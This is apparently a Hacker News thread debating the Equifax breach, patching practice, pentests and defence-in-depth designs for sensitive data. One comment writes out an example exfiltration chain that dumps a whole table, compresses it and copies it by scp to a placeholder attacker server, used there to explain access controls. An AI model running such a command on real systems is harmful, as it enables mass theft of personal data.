If a hacker can use just one CVE to break into your system and do a database dump (or equivalent), the system is architecturally wrongly designed and only being protected by a single layer of security. Which means, any one from the inside can access pretty much the info as the hacker, which is horrible.
For example, are the items in DB encrypted? Are database backups encrypted? Are different items encrypted using different keys? I don't think EFX did it right.
If a hacker can use just one CVE to break into your system and do a database dump (or equivalent), the system is architecturally wrongly designed and only being protected by a single layer of security. Which means, any one from the inside can access pretty much the info as the hacker, which is horrible.
This is how it works at almost every company. Call it horrible if you want, but everyone stops short of describing in detail the exact architectural replacement. And when someone does, it inevitably has flaws that make it impossible to meet business goals.
It's too easy to handwave this away as "well, get a better architecture." Everyone knows that; the hard part is, what architecture? How does your architecture work in practice? Encrypting items won't help when the keys need to be stored in the same place to access the data. The attackers will just go after that box instead of the DB.
You can guard it more carefully, but the point is that some box somewhere needs access to a substantial amount of the data at any given time. It's the nature of a credit bureau.
In multiple threads now I've seen you express this sentiment. I just don't buy it. Vanguard hasn't had a leak like this. USAA hasn't had a leak like this. ETrade, Fidelity, etc, no leaks like this of which I'm aware (correct me if I'm wrong). These are big plodding institutions too. No leaks like this from Google nor Facebook nor Amazon. Maybe you're arguing it's just a matter of time, but I disagreee.
Equifax had a trivially easy architecture to break.
Minimally, the data should be on a separate set of servers protected by an API with rate limiting, and that API should be implemented on top of a different framework than the front-end servers to minimize the chance that a single flaw would open up the entire set of data. This isn't rocket science. Equifax is a multi-billion dollar company. They could and should have done better.
Please stop defending them?
Disclosure: I work for Yahoo (er, Verizon) since late 2013. I don't know the details of Yahoo's data leaks, but it was not as trivial as getting RCE on Yahoo's public facing servers.
When two people are clearly intelligent but disagree, the reason is almost always a different set of experiences. My experience differs from yours; if I could Vulcan my brain to yours, you'd see why I feel this way. You might still disagree, but it would be far less clear cut.
Now, I've seen nearly a hundred codebases and they all looked pretty much like Equifax. I don't even need to see Equifax to know the kind of disaster their codebase facilitated.
Equifax's codebase is your code, and my code, and Bob's code. The only way to make this situation better is to talk openly about it. And the best way to do that is to actively defend the unpopular side in order to call attention to uncomfortable truths. It's a calculated strategy.
Just because you worked at a place with good security hygiene, it makes no difference to the world at large. Everybody else looks like Equifax. We need to (a) acknowledge that and (b) actively seek out solutions. That's what's happening here.
Ask yourself: "Why do I disagree when I've seen one or two enterprise codebases?" Those big, plodding institutions you mention are similarly vulnerable. Everyone is.
Why aren't data breaches happening almost daily? Because it's illegal. It's no coincidence that companies with public bug bounties are among the hardest targets to hit. When you make it not-illegal to attack you, surprise: you find the vulns.
A good question is, "is it illegal for a white hat to attack my business?" If the answer is yes, seek to change that. It's a low effort thing that will increase your security posture. But it's no substitute for $40k pentests.
I don't doubt that there are other Equifaxes out there, nor do I doubt that there will be more leaks. But this wasn't a simple matter of a horrible code base. Heck, the leak wasn't even due to Equifax code, it was due to third party code. Other companies of Equifax's size apparently do better. Equifax should have done better, and I'll bet if the penalties for losing this data were more severe, would have done better.
(replying to your "What if $40k for a pentest becomes a rubber stamp?" question, which was an important observation)
Mm, it can become that. It's important to get a pentest from a reputable firm. At the one I worked at, it was a point of pride to come up with clever attacks. We'd make a sport of it and try to one-up each other. But it's easy to imagine some other pentest firm just going through the motions, running Nessus and calling it a day.
Unfortunately, that's where money really does make a difference. $40k is at the low end of how absurdly expensive pentests are. Yet they make all the difference -- one app that I pentested was at a trading firm. I took that app from "typing ' leads to SQLi in their Node backend," and "there was SQLi in their Java backend if you were clever" to "you'd have to be more clever than me if you want to breach this app."
Most attacks come from unsophisticated adversaries. This implies that raising the bar higher than these guys gets you 80% of the way home. The other 20% is much harder, but it's doable if your company has a culture of caring about security.
> I think that more and more CISOs are becoming comfortable with the cloud and companies are insisting that CISOs become comfortable. So I always say that given enough time, we can secure anything and find a way to say yes to it and business-driven CISOs are of that mind.
> If a CISO can come up with a list of controls that he/she is comfortable with, then by and large the evidence proves that those controls are working effectively and are going to satisfy the elements of any framework that you use.
These are two soundbites from an interview with Susan Mauldin from over a year ago. Someone didn't want us to hear them, according to the timeline[1] of when someone remembered and reported that these interviews happened on September 9, and how soon after (on September 10) they were taken down (and then late last night, at least partially recovered again, further on down in this very HN thread!)
They are not even especially damning soundbites if you put them out of context and honestly evaluate them in a vacuum, but it does put some additional context on "it was due to third party code" and in the context of this whole discussion, it is clear why someone did not want us to see this interview.
If the job of the CISO is to deliver the project under budget and on time, rather than to do the job correctly as you and I understand it, then we are certainly more likely to find ourselves in this position. So let's keep having these discussions and make it better! It is absolutely your codebase and my codebase, we are all in this kind of trouble (or, we could be... if we all similarly had 140 million involuntary "customers" entrusting us with their SSNs and credit histories.)
> If the job of the CISO is to deliver the project under budget and on time, rather than to do the job correctly as you and I understand it, then we are certainly more likely to find ourselves in this position
The same fault is responsible for the Space Shuttle Columbia crash. It's called "leadership without vision." If you put a manager in place and give them tight constraints on how they deliver the product, they will almost universally deliver a critically flawed product ... albeit, on time and under budget.
You can bet all you want. Your head will roll next, after Equifax and everyone else you decide to demonize. Once the avalanche starts, it won't stop.
Know what happens when you demonize something? People stop reporting it.
Look at the actual damage to actual people. You are arguing for prison time for the execs, if I remember correctly. Yet it's unclear that a single person has yet been materially damaged by these leaks. If you want to suck away N years of someone's life, you have a higher bar to clear.
(Meta: I think we edited our replies past each other.)
I haven't commented on the Equifax incident, so you're confusing me for someone else. I don't have an opinion one way or the other on criminal negligence.
How do we incentivize (or regulate?) companies to do a better job handling confidential data?
Ah, gotcha. Isn't it a bit scary seeing people argue for prison time for this? It's pretty easy to imagine webdevs becoming the actual targets / scapegoats rather than the execs.
A note of "Well, let's not be too hasty" would seem to be in order.
Part of the problem is that security breaches matter, but they don't matter. It's like the negative externality of factory pollution. One day perhaps the effects will become visible, but this disaster is about as bad as you can get and it's still not obvious that a lot of people are going to lose anything significant from the breach. If someone wanted to impersonate you, they can usually find a way already.
Of course, if the 140M SSNs become public, that will change the situation completely. Possibly even for the better: then we'd finally stop relying on them to be secret when they were never designed to be.
Believe it or not, the situation now is drastically better than it was a decade ago. People care about getting pentests now. You can grudgingly force a company to fork over the money.
One of the best ways to get companies to become more secure is to force them. Most of the companies who were being pentested didn't want to be; they were forced to, because some other business refused to do business with them until they produced a document stating they were reasonably secure. This special document is only obtainable from a security firm; hence, pentests happen, and the world is marginally more secure.
From what I've seen people want jail time because of the insider stock trading, not because of the security problem itself. So a webdev wouldn't be responsible unless they also engaged in insider trading.
Why would all of the various criminal organizations across the world be deterred by something being illegal?
The logic you have laid out makes it sound like only white hats would ever try to attack a credit agency.
I'm pretty sure by the definition of black hat, and criminal organization, if these companies have something they want, and they have a technical means to get it, the fact that it's illegal is not a deterrent, it's actually their business model.
The vast majority of adversaries are incompetent or unmotivated. It's why breaches don't happen daily.
Look at it this way: If you get a pentest, you will immediately discover there were glaring security flaws that an attacker could have used to get into your network. This isn't true in every case, but for example I can count on one hand the number of companies I didn't get at least an XSS against.
I had no magic. I'm just a guy using Burp suite, working together with someone else using Burp suite. When two talented people work together to break your stuff, they pull out rabbits that nobody knew existed. Especially when they've been doing it full time every day for a year.
I'm sure black hats have talented people at their disposal. But they are selective. Launching a real operation against a US target is risky unless you live in Russia or work in China's army. And while it's valuable for Russian black hats to swipe Equifax's PII, other data troves typically aren't valuable enough to target.
To put it another way, if Russians got into Facebook, so what? They'd get everyone's sultry private messages. Yet Facebook cares more about security than almost anyone else. That's why it's almost impossible to swipe their data.
The vast majority of companies are in the "If Russians got in, it doesn't really matter; also we don't care" category. These are the mom and dad shops that use duct tape and glue for their payment processing. Above this are our companies: If Russians got in, it would be a minor disaster, but we care about preventing it. Except usually we don't care enough to put down $40k.
Then you have companies like Equifax. The worst of both worlds: They weren't careful enough with their security, and it was an unprecedented disaster when someone got in.
Yet even here, it's unclear how much this unprecedented disaster is going to materially harm people. Will those 140M SSNs show up on the black market for sale? Who will pay for them, and how much? (Hopefully it will be posted in full, in clear text, so we can all switch away from the stupid SSN system we've been relying on.)
So when it's a combination of not too valuable to attack you, very costly to improve your defenses, and not too harmful if you screw up, you get the present world: ~everybody is vulnerable, but few companies care enough to pay more than lip service. Why would they? Even if they lost everyone's data tomorrow, it would be little more than egg on their face.
This situation is changing, slowly. If the diff between 2008 and 2018 is like 2018 to 2028, we will be in excellent shape. But we have to avoid falling into traps like mandating regulation at every company, or sending people to prison. Those are tempting but misguided efforts: regulation would reduce the effectiveness of pentests, and sending people to prison will cause security breaches never to be reported.
It will be hard, particularly when the world reacts like this: https://i.imgur.com/g01f9vV.png But companies like Apple are paving the way forward. Even if they help no other companies, they are proof that security really can work at scale. The trick is to make it not cost Apple's resources to get remotely close to their security posture.
(I hate to pick on Russians specifically, but they have no extradition treaty with the US. It's uncontroversial to point out that many black hat attempts originate from there.)
Facebook cares about security because there is something else at stake. Their trade secrets to start with avoiding being front run. But people will still care if they believe Facebook was not safe even if it's for superficial things.
> Just because you worked at a place with good security hygiene, it makes no difference to the world at large. Everybody else looks like Equifax.
Equifax did have good security hygiene. But they didn't have perfect security hygiene, and this particular gap cost them big time.
Most security incidents are like terror attacks that are averted. You read that authorities in Spain stopped an attack, and it means the system is working and people are safe. Then something explodes in London, and people are hurt, and you realize that there's no such thing as complete security.
It remains to be seen how much this will cost Equifax, IMHO. Public opinion aside, it may not come down to much in termw of dollars and it's dollars that drive behavioral changes.
I don't believe those systems are necessarily any more secure than Equifax's. It may be that Equifax got breached first. But it's also partially because it's actually incredibly difficult to steal funds from traditional financial institutions. Not because of technical security measures. But because of procedure and regulations.
As an example, money illegitimately moved from bank A to bank B can (and in most cases must) be reversed. Even if done digitally.
I don't see sillysaurus3 defending Equifax. I see him talking about the elephant in the living room. No system is invulnerable yet the fortune and well being of half (or more) of the population of our planet depends on those systems being safe. We need a new paradigm. The basic principles of security, no matter how skillfully and deeply applied are inadequate to defend against a determined attacker. We need a new paradigm. I'm not sure what that is, and as long time Microsoft detractor, I'm loathe to say maybe Azure's just-announced secure enclave architecture just might be that new paradigm. Of course, I'm sure they'll fuck it up some way or another.
You're right. I mischaracterized sillysaurus3's position. I would only argue that there are different levels of competence in protecting data and some company has to be the worst. So far, Equifax seems to be that company. Right now, they are deserving of scorn. At the same time, sure, it's good to recognize that we're failing at security as an industry.
I agree with you 100%. I prefer to characterize our current security landscape as the "Bear Attack" model. If you run slow the bear will eat you first. But even if you run faster than anyone else the bear will still eat you when she catches you.
Like much of the infrastructure in the real world, the sad fact of cybersecurity is that in many cases, attacks aren't known merely because someone semi-informed has not committed much effort to getting in, or more likely, has not yet triggered an event that would publicize their intrusion.
sillysaurus may be overgeneralizing a bit but he is correct about the vast majority of companies. To me, the key differentiator between companies with serious security projects v. companies with me-too, mantlepiece-style security projects is active, engaged technical leadership at the very top.
This is not to defend Equifax as much as it's to desecrate the widespread dogma of the managerial class that an MBA qualifies a person to lead any project. Time after time after time, most of us who've worked in corporate America have seen security pushed to the bottom of the stack, only becoming a consideration for about 18 months after the last close call or underpublicized breach. There is virtually no appreciation for the problem itself at high levels, or the complexity involved in reasonably subjugating it.
CISO is something of a nightmare job because you're essentially the company's designated patsy/lightning rod. Most of the time, CISOs and those in analogous roles get stuck with the blame for the company's security without ever really being given the authority to do anything about it.
I knew a CISO who set up camp, including prop tent, outside of the CIO's office until he finally agreed to get his guys to patch a server. The CISO took a picture of himself doing so, because he knows the game; if the intrusion occurred, he would have apparent visual proof that would allow him to deflect blame onto the CIO.
Reckless disregard like this is absolutely common and routine, and if you have any doubt about that, a cursory inspection of the sites of companies that are not tech pioneers will easily disabuse you of any contrary notion. Equifax is not alone here, not by a long shot. Not even among large companies dealing with sensitive financial data (don't ask how I know).
The only reason we haven't seen (or, more likely, haven't learned about) widespread cyber-intrusion-apocalypse is because semi-competent people just have other things to do, and there is substantial legal risk if caught. I fully believe that 95% of America's biggest companies have systems that are easily penetrable.
Again, let me reiterate that this is not making an excuse for Equifax. It's just acknowledging that the problem supersedes this single instance. We need a revolution in system admin and application security before we'll solve these issues, because the plain fact is that companies simply can't be trusted to do it under the current conditions.
Things one could do that would increase security without hindering business goals:
- PATCHING OF KNOWN CRITICAL SECURITY VULNERABILITIES IMMEDIATELY. This is an architectural decision! If you cannot put out a hotfix within months of a vulnerability being made public, YOUR APPLICATION & DEPLOYMENT DESIGNS ARE BROKEN.
- WAF rules for common attacks and known CVEs
- Least privilege enforced architecturally via stored procedures or microservices or something else so that a vulnerability in one application (the online dispute portal in this case) can't lead to a dump of everyone's PII.
- Data should be encrypted and encryption keys should be stored apart from both the application and the data. Upon startup, the application should make an authenticated request to read the encryption keys into memory. This significantly raises the bar to dumping sensitive data.
- Monitoring for connections transferring anomalous amounts of data
That's just off the top of my head. All of these can be designed into a system and still maintain 100% uptime.
It's also a business decision. You need to invest staff time in testing and automating said updates, and will inevitably lead to more outages. Thus less profits, directly contrary to your assertion. Managers have trade-off between a small but relatively predictable cost, and a large but presumed highly improbable cost. This is something that neither data nor human intuition are particularly good with.
Best case scenario insurance lets you convert your large risk into a small predictable cost, and the premium difference decides whether you stay on the CVE treadmill or not. But its not like actuaries have a lot of data to model to the point of accurately imposing a cost per day of unpatched CVE.
Worse, many places have competitors, and if they're choosing to take on risks in the name of lower prices and higher market share, the customers of your secured app walk out the door. Not only do you need to invest in security, you need the competition to as well. I have a few ideas on how to achieve this, but they're not historically palatable to the HN crowd.
> You need to invest staff time in testing and automating said updates, and will inevitably lead to more outages.
It should follow the same processes as any other application update. Are you suggesting it's impossible to push updates to software without incurring outages?
Judging by the number of banking and government institutions that have weekly or nightly planned outages, there's appears to be a number of legacy systems where companies certainly think upgrades mandate outages. Even a non-zero probability of an outage is a cost.
Obviously this is fixable, but it's no free lunch.
The problem is that a lot of these systems aren't legacy. They've been built within the past 5 years, but the customers would almost rather continue on with their weekly outages than apply basic modern architectural designs that allow for functionality like round-robining updates behind a LB.
> It's also a business decision. You need to invest staff time in testing and automating said updates, and will inevitably lead to more outages.
There are many vendors attacking this exact problem from many directions, including my employers[0], but pretty much every platform vendor has something here.
I do agree that automation and risk are at the root of the tension between security and stability. It's a feedback loop that can run in two directions. If you embrace stability, the loop becomes "no changes ever" and security becomes much more difficult to achieve in practice. If you embrace security, then at first you face instability -- but embracing rapidity and building out tooling for it makes you both more secure and more stable in the long run.
> But its not like actuaries have a lot of data to model to the point of accurately imposing a cost per day of unpatched CVE.
I'd be interested to know if this is actually true.
I recently got interested in the FAIR risk modelling approach. It requires a bunch of legwork, so in practice it won't catch on without determination to use it or something like it.
Usefully it breaks risk down into more easily-estimated, easily-tracked subcomponents[1]. "Probability" becomes "Loss Event Frequency", which further breaks down into Threat Event Frequency and Vulnerability, these break down further in turn. Similarly, the usually-vague "Impact" becomes Primary Loss and Secondary Loss, each of which has 6 specific types that can be estimated. Those estimates can be based on available data, whether your own or industry statistics.
> Worse, many places have competitors, and if they're choosing to take on risks in the name of lower prices and higher market share, the customers of your secured app walk out the door.
Interesting points, but you seem to have missed responding to your last > quote. The "> Worse, many...". I'd be interested to see what your remarks are there.
Ah, good catch, and this is why I should wait for caffeine levels to peak before screeding.
At work we have a lot of customers now, many of them with large security orgs. Their approaches vary a lot, presumably because of their experiences and security maturity.
Beyond a certain level, there is always a security org and quite typically it has veto powers that override any local manager's budgetary concerns. Whether that veto is applied well is quite distinct from the way it creates a ceiling over potential spending on features.
That all said, I agree that there are fundamental properties of security that will cause it to be consistently under-attended relative to what a more actuarial or financial model would suggest is rational. It is only observable in its absence, but most feedback systems -- formal or informal -- rely on observable signals. Market releases may lead to a juicy bonus at many companies. Invisible improvements won't.
I've thought about this a lot in the past few months and published a bunch about it internally at Pivotal. I'm not alone, of course. We're streets ahead of many vendors, but I also feel we're only getting started on the deeper and more difficult process of blending it deeply into our cultural DNA. It's a culture which believes in doing the right thing, but also a culture which detects vetoes as faults and routes around them.
> PATCHING OF KNOWN CRITICAL SECURITY VULNERABILITIES IMMEDIATELY.
I worked in system admin for many years. If anyone was actually foolish enough to do this, they would be dealing with multiple major outages every year.
> for every complex problem there is a solution that is simple, obvious, and wrong.
"There might be an outage" is the stupidest reason I have ever heard to advocate not applying security patches.
There's plenty of companies that are able to regularly patch and upgrade software, incident free. If you team isn't able to do this, they need to fix their process instead of putting their head in the sand.
I am not defending the totality of EFX's process by any means. I am just pointing out that "install every high severity patch right away" is not as easy as it looks.
Others have pointed out this patch was not available for all current versions, for example. So, to install the patch you need to upgrade. Oh, that breaks <dependency>. So we need to upgrade <other thing>. But that regresses a feature we use ....
The major issue with EFX was the fragility of their overall architecture. A single weakness should not be enough to lay the whole DBMS open.
The tech industry has to move more towards declarative systems, rather than procedural ones. Docker, Kubernetes and similar tech can auto-update in the background without any downtime. It's impossible to maintain thousands of VMs without some sort of declarative system.
It actually decreases complexity. Updating 1000 VM servers using these technologies can be made automatic. True, it provides an additional attack surface, but the gains of having everything always patched are well worth it.
> Alternatively, there are sometimes political reasons. A director may not want to risk an outage for fear of being dressed down by their VP.
This is such a weird thing to me. I've never worked anywhere like this and so I have a hard time imagining it really. Wouldn't that same director get more than dressed down by the VP if on their watch a _known security vulnerability_ was ignored and the system was breached? I just can't understand this way of thinking.
It's easy to understand once you get just how simplistic it is. The VP will deliver a dressing down if the company loses money and the blame can be placed on the director.
The cost of an outage is very easy to quantify (revenue per minute the system is down), and the probability that something will go wrong while applying the patch is also somewhat easy to predict, and usually greater than zero. The director will be blamed with certainty for the outage, since he approved it.
The cost of a security breach is difficult to quantify; it depends on what gets breached and how bad. Note here, I say breach, not vulnerability. Even if there is a known security vulnerability, it's not immediately obvious in all systems what the consequence will be; there may be other mitigations in place outside of software that reduce the potential damage, or there may be unknown vulnerabilities that are exploitable due to the known vulnerability that make would make a breach worse. The lack of certainty about the consequences means it's also possible for the director to avoid blame if the breach is minor ("how was I supposed to know that other team is still using MD5?"). If there is no breach, then there is nothing for the director to be blamed for.
Given that the director would like to avoid being dressed down, director will be more inclined to delay patching over possibly causing an outage, because the costs of an outage are easy to predict and he will take all blame for it. The breach may never happen and even if it does, it may cost him personally less than the outage.
If this still seems weird, it might be because you are someone who views patching as an easy thing to do, because you probably work for a software company. Software companies are used to managing changing software, and have all kinds of practices around minimizing the risks of doing so. Non-software companies typically find patching to be hard and costly because their core business is something else; changes can disturb the "something else."
While you may sort of have a point for low-severity issues (if you patch every one ASAP, you are constantly restarting; should be tested in a group in stage and released to prod on a regular timeline), this was a 10.0 severity CVE and it is _definitely_ the kind of issue that you tolerate some downtime for. Check out the CVE, this could be exploited by anyone with a basic knowledge of cURL in 60 seconds or less. The vulnerability was just a matter of sending an arbitrary command in an HTTP header.
You need to do some testing of course. "IMMEDIATELY" doesn't mean within 5 seconds. If you can't properly apply security updates in a reasonable time frame without it leading to major outages, something is extremely wrong with either the architecture, the chosen software or the QA and deployment strategy.
> without it leading to major outages
I think I would have preferred an outage over leaking millions of american's private information.
It's not the first time this has happened to a company, and it surely won't be the last. We've already had full 100% hindsight vision a dozen times over, and plenty of companies have chosen to ignore it.
- PATCHING OF KNOWN CRITICAL SECURITY VULNERABILITIES IMMEDIATELY.
Immediately? No real company can do this. 1-2 weeks after the announcement is the best you'll see, even with something of the magnitude and publicity of Heartbleed. I'm not saying that's how it should be but that's how it is. Most organisation's it's quarterly!
All of these can be designed into a system and still maintain 100% uptime
Sure. If you were designing from a clean slate right now. The vast majority of organisations in the world aren't.
And believe me: in 10 or 20 years your new design would have revealed flaws too, and look laughably primitive to the practitioners of the day.
What's the solution then? An architecture in which no single compromise can compromise the entire system. That's getting harder and harder to do as the landscape homogenises around Lintel.
Impressive. Let me amend my original statement from "no" to "a tiny minority" then but I believe my point stands - frantic patching to keep up is no substitute for an architecture with no single point of vulnerability.
If you're on an computer there is always going to be a single point of failure with a window of venerability. Any piece of software or combination thereof will possibly leave a RCOE veunerability, which means you always have a single point of veunerability. I think what you mean is, is the unauthorized access isolated enough such that by the time an attacker finds the next thing to attack you've noticed the odd network behavior, eg defense in depth? If so, yes. But theres a difference between frantic patches and a well controlled, tested and easy to deploy set of software which makes pushing updates much less "frantic" and much more controlled. No matter what your defense in depth is you're always going to get an "oh fuck we are totally uncovered" moment, this is where the agility helps out. Your other option in this case is "the emergency shut-down for the oasis", well or the equifax option of sticking your head in the sand and running the servers open for months. I assume we're all responsible adults here though so that last one is off the table, it all comes down to risk assesment. ef seems to have miscalculated on that one.
We need to differentiate then between "patch for this one specific thing" and "upgrade to the next version" which are often conflated. The former could literally be a one-line change to correct an off-by-one error say. The latter will have to go through the full regression and release process. Often it's a grey area.
Companies like Red Hat, Suse and Ubuntu provide security backporting for exactly this reason. It's one of the major reasons that folk subscribe to them.
Unless you are part of that "tiny minority", you have no business handling information that can substantially negatively impact people's lives.
Isn't it interesting that one needs a license to drive an automobile and yet companies that handle this type of information get to do so without demonstrating the required level of competence.
Isn't it interesting that one needs a license to drive an automobile and yet companies that handle this type of information get to do so without demonstrating the required level of competence
Oh, it's the whole industry tho'. VMS running on DEC hardware was at a level of security and reliability that we can only dream of today, but it was abandoned on the scrapheap and replaced by glorified PCs running a hobbyist OS. If you wanted to build an infrastructure on old-skool principles now you couldn't, you can't get the components anymore. The truth is we're fighting a losing battle and the real enemy is ourselves.
They can, but it requires automation. I've worked on and used tooling for just such things. We can see an upstream CVE and have it patched in production inside 48hrs. Usually the same day.
Disclosure: I work for Pivotal. All this stuff (Cloud Foundry, BOSH etc) is opensource, but we sell commercial versions too.
> No real company can do this. 1-2 weeks after the announcement is the best you'll see
You don't need to patch your software right away, but you should have other strategies for mitigation such as a WAP in front of your services that you can configure to block malicious traffic when you identify a remote code execution vulnerability.
seriously, FFS these are guidelines that we use for not-remotely-that-sensitive-data and equifax that literally...
"You had one job to do, protect our data"
Can't follow?
This is just business being
a) ignorant
b) incompetent
c) careless
one or more of the above applied for a hack like this to happen.
It's really sad that even ycombinator crowd doesn't get it, given that the crowd here is significantly more technical and sensitive to these issues than the average Equifax Joe..
No, we get cases A, B, and C, because those cases are really easy for anyone to understand. What you're missing is that some of the "ycombinator crowd" have worked with enough "average Equifax Joes" enough to know that the problems faced by "Equifax Joe" are not always solvable by merely being knowledgeable, competent, and careful.
> This is how it works at almost every company. Call it horrible if you want, but everyone stops short of describing in detail the exact architectural replacement. And when someone does, it inevitably has flaws that make it impossible to meet business goals.
No, it's not how almost every company works, and yes it IS horrible. Do you know why people stop short of giving details of what should have been done? Because that is a full time job for a entire team of people in any place that needs real security, and part of that job is to be constantly rooting out flaws in both design and implementation and fixing them. And guess what, if your business involves storing and retrieving sensitive personal information on millions of people, then security needs to be one of your business goals. If it is not, then that is negligent.
> It's too easy to handwave this away as "well, get a better architecture." Everyone knows that; the hard part is, what architecture? How does your architecture work in practice?
It is also easy to handwave away the real work that real security professionals do. Security is not a just some module you can strap into your systems, it is an ongoing process that requires vigilance and competence. Yes it is hard, but being hard is not an excuse
> Encrypting items won't help when the keys need to be stored in the same place to access the data. The attackers will just go after that box instead of the DB. You can guard it more carefully, but the point is that some box somewhere needs access to a substantial amount of the data at any given time. It's the nature of a credit bureau.
So you are implying that data encryption is not useful for protecting sensitive data because you have to store the keys somewhere. If that were the case then data encryption in general would be useless, we know that is not the case. This is a design or implementation problem, not an encryption problem.
It's frustrating how people seem not to think it's wildly, ludicrously incompetent for nothing in your architecture to complain about your front end servers querying 140m records. The fact they don't have even the most basic data access controls in place make me assume they're still fully owned.
You're playing IT if you can't deploy a CVE fix in 60 days.
Finally, they only did this because of greed. They encourage online disputes because it saves them money and gives them greater rights vis-a-vis paper disputes delivered to them via snail mail. They could simply have taken the service down if if they couldn't deploy a security patch in two months.
Amateur hour everywhere.
ps -- the data controls I mentioned above were implemented in a company of ~15 eng dealing with similar PII. If you owned front end servers you could query individual records, but you would have to own more services to be able to "\copy (select * from data) to /legit.file; gzip /legit.file; scp /legit.file.gz $MY_SERVER". And if you tried pagers would have gone off all over the company.
"How does your architecture work in practice? Encrypting items won't help when the keys need to be stored in the same place to access the data. The attackers will just go after that box instead of the DB."
Simple. Don't store a key with the data. A credit bureau only incurs liability by knowing the PII for hundreds of millions of people readable from one location - that they provide to everyone who asks!
How does a company create a better architecture? Separation of duties and responsibilities, defense in depth, authentication and authorization, cryptography, updating software, etc. Hire a security team to help with vulnerability analysis, design reviews, due diligence, and threat modeling.
This gets solved every day at many companies.
"You can guard it more carefully, but the point is that some box somewhere needs access to a substantial amount of the data at any given time. It's the nature of a credit bureau."
Yes, but the elephant in the room is that a credit bureau possesses that information in usable form. This can be taken care of by key management, where the individual owns the key and only one key is able to exist per individual at a time. Then, only those credit grantors who have been authorized by the individual are able to update or view the data.
In cryptography the operating assumption should always be that everything is known about your data except your key material, which is kept private.
Yes, but the elephant in the room is that a credit bureau possesses that information in usable form. This can be taken care of by key management, where the individual owns the key and only one key is able to exist per individual at a time. Then, only those credit grantors who have been authorized by the individual are able to update or view the data.
This is what I mean by not meeting business goals. It is clearly a bad idea to give Grandma an irreplaceable key. But that's what this proposal is.
Wrong. It is your interpretation that this is an irreplaceable key. You are trying to say that a design is wrong, because you believe that your implementation would be wrong.
Uniqueness is a different property from replaceability. And, replaceability is not necessarily the correct property to design for, key rotation and recovery from loss are the properties. What you want is the ability to rotate keys and recover from the loss of keys.
Put machines with sensitive data on a private network. Have one machine/one set of machines connected to both the private network and public network that proxy requests to the data machines. Proxy by parsing original request and then rewriting (i.e. don't just pass along the request). Rate limit and implement notifications on data machines so that if the proxies are compromised, the attacker can't easily do a full data dump. Don't allow remote administration only physical (this rules out this architecture for most companies, but honestly, not a company like equifax with incredibly sensitive info and where network locality is not a big issue).
To the remote administration point, if you have this architecture and still open up the private data-network to remote SSH connections, you're at least limiting the attack space to vulnerabilities in SSH and the network stack/firewall on your ingress server, but not vulnerabilities in the application server. Much better than nothing.
If you look at the CVE, it's literally plain shell commands as strings in the Content-* headers. These commands would appear to be local with whatever user the app is running as.
And that's the ridiculous thing: this is actually a fairly easy thing to protect against. Why the hell did the webapp servers have direct access to the database? If there was a service in the middle mediating requests, that would have been another line of defense. Sure, maybe _that_ service might have holes, but it'd be another hurdle the attacker would have to clear.
>It's too easy to handwave this away as "well, get a better architecture." Everyone knows that; the hard part is, what architecture?
How do you read linux firewall documentation with the first example being old school public->DMZ->private? So your web server got hacked? That means what? Your database is across a single port through the firewall, and ACLs mean that any traffic arriving at the part from the DMZ CIDR can only do the limited set of queries that provide single-person-at-time. SSH from hacked box to database? Got a zero-day for the firewall (because 22 isn't open from there), and a zero-day for sshd (because its keys only). I know this and I'm not one of our hundreds of security people. (And as I'm not the security guy, if any actual security guys want to school me here, please do so!)
Sure, I agree that business peeps will say "Oh that's too expensive I don't care", but lets not pretend that we don't know how to do this.
Be clear, if you are the IT security guy, and you agree to bow down to "business" people (you're a business person) who tell you "No, that's too complicated", then just be clear that you are getting fired when the shit hits the fan.
I feel there's a couple of places where this doesn't reflect reality.
The first very likely scenario is given business logic says a web server application needs certain data, where "certain" is "pretty much all of it". So your application server in that DMZ has a database credential it needfully holds.
Which in turn is a credential an attacker can use to access "pretty much everything".
single person at a time
The majority of modern web applications will open a series of database connections. One application server limited to one DB connection for a public application is probably going to break the app.
Overall, security people don't get the choice about "bowing" to business people in most of my experiences. I'm not saying scape goating never happens, but this
then just be clear that you are getting fired when the shit hits the fan.
What do you think the alternative is? Tell them you're quitting early on because they won't do what you say?
I can present risks, and offer mitigations. More often than not, some get through easily, some never will, and it's those on the fence you work on constantly improving.
Heh. I don't mean the database can do only one query at a time. I mean the db is set up so the front end can't just hit it with a SQL query to dump the database.
Now, sure, if the front ends query 10% of all records every day, then yeah, it only takes 10 days to get all the data, one query at a time, without triggering any alarms. They had 75 days. I don't know though, on any given day, what percentage of the population are getting credit checked? And did they have any alarms?
You don't even allow that. I'll use REST as an example because that's what I use, but any form of RPC would work.
App server has no database access. No DB credentials, and no network access to the DB. It does, however, have access to a service that sits in front of the DB. It can ask the service:
GET /users/10
... and that's it. It gets one record. The service fronting the DB has a single query it can execute:
SELECT * FROM users WHERE ID = ?
Sure, if someone can compromise the user-data service, then they have more access. But that's what defense-in-depth is: if an attacker compromises one system of yours, they don't get the crown jewels: they need to keep going, and each new attack they need to mount costs them more, and sometimes even makes them fail.
But the development world has been turning on stored procedures for a while. You've got popular frameworks actively shunning the concept[0].
I've seen the topic on HN before and it's generally been the view that there is rarely a use case in modern times. We can't suddenly say everyone is expected to have everything in a stored procedure now that it's convenient.
True, enforcing stored-procedures-only is an antiquated methodology that is frowned upon these days. But not because it doesn't work -- rather because it's a bad idea to put your business logic in the database itself, which is what usually happens.
The more modern equivalent, is to just have an "app server" that sits in between the web (DMZ) and db tiers. The app server can basically be just another web server that provides an API for the actual web server to use. So from the web server's point of view, it still has restricted access, but you get to write all the rules in your normal backend architecture/language rather than building them with stored procedures and triggers and all that.
Besides, the "rarely a use case" isn't the same as "never", and if you can envision any scenario where it would be worthwhile to go to extraordinary means to ensure security, I think "we have all the data needed to commit identity theft on half of all Americans" counts. If stored procedures is a convenient way for you to limit the impact of a breach from your web server/DMZ, then do it if you have data that important. Do 20 other things that are inconvenient too if it gives you defense in depth.
We use stored procedures. We actually use them for a different reason: we treat the database server as an application server that happens to use an proprietary binary protocol instead of HTTP. Its API is exposed using stored procedures. This allows us to maintain and update the database data model independently of the "traditional" web tier. DB experts can work on the most effective data model without hunting through client source code.
It also means that we can use access controls on the API (the stored procedures).
In my experience, allowing anyone to hit a database with SQL leads to poor code quality, bugs and performance problems. And security issues.
If the business people at Equifax didn't spend through the nose on security then they are negligent, quite probably criminally so.
You can argue that Target is not in the "we need to secure this treasure trove of data" business and so them leaking 40 million credit cards is just an unfortunate accident.
But when you sit on the PII of 150 million people then you need to be top notch security wise. I am sure the eventually inevitable courts will appreciate a company culture where admin/admin is acceptable.
> just be clear that you are getting fired when the shit hits the fan.
